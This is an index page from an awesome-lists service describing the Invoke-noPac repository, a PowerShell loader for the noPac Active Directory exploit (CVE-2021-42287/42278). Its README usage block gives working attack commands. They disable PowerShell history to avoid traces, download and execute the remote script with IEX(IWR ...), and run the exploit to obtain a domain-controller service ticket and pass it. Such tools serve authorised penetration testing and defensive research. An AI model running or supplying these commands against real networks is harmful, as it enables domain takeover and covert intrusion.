Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/ricardojba/Invoke-noPac

.Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac
https://github.com/ricardojba/Invoke-noPac

Last synced: about 2 months ago
JSON representation

.Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac

Host: GitHub
URL: https://github.com/ricardojba/Invoke-noPac
Owner: ricardojba
Created: 2021-12-13T19:01:18.000Z (about 3 years ago)
Default Branch: main
Last Pushed: 2023-02-16T10:45:19.000Z (almost 2 years ago)
Last Synced: 2024-08-05T17:43:36.291Z (5 months ago)
Language: PowerShell
Homepage:
Size: 467 KB
Stars: 59
Watchers: 4
Forks: 12
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - ricardojba/Invoke-noPac - .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac (PowerShell)

README

        # Invoke-noPac

## The .Net assembly is based on my fork https://github.com/ricardojba/noPac that has a few code changes to improve upon the original.

[PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) style .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit [noPac](https://github.com/ricardojba/noPac).

Usage:

```

Set-PSReadlineOption -HistorySaveStyle SaveNothing

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12

# [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

[system.net.webrequest]::defaultwebproxy = new-object system.net.webproxy('http://proxy:8080')

[system.net.webrequest]::defaultwebproxy.BypassProxyOnLocal = $true

[system.net.webrequest]::defaultwebproxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

# [system.net.webrequest]::defaultwebproxy.credentials = Get-Credential

IEX(IWR -UseBasicParsing -UserAgent "hi-there-blueteam" 'https://raw.githubusercontent.com/ricardojba/Invoke-noPac/main/Invoke-noPac.ps1')

Invoke-noPac

Invoke-noPac -Command "scan -domain full.domain -user domain_user -pass Password123!"

Invoke-noPac -Command "scan -domain full.domain -user domain_user -pass Password123! /enctype rc4"

Invoke-noPac -Command "-domain full.domain -user domain_user -pass Password123! /enctype rc4 /dc dc.full.domain /mAccount testmachine /mPassword testmachinepass /service cifs /ptt"

```

## Credits

[cube0x0](https://twitter.com/cube0x0) for the original [noPac](https://github.com/cube0x0/noPac).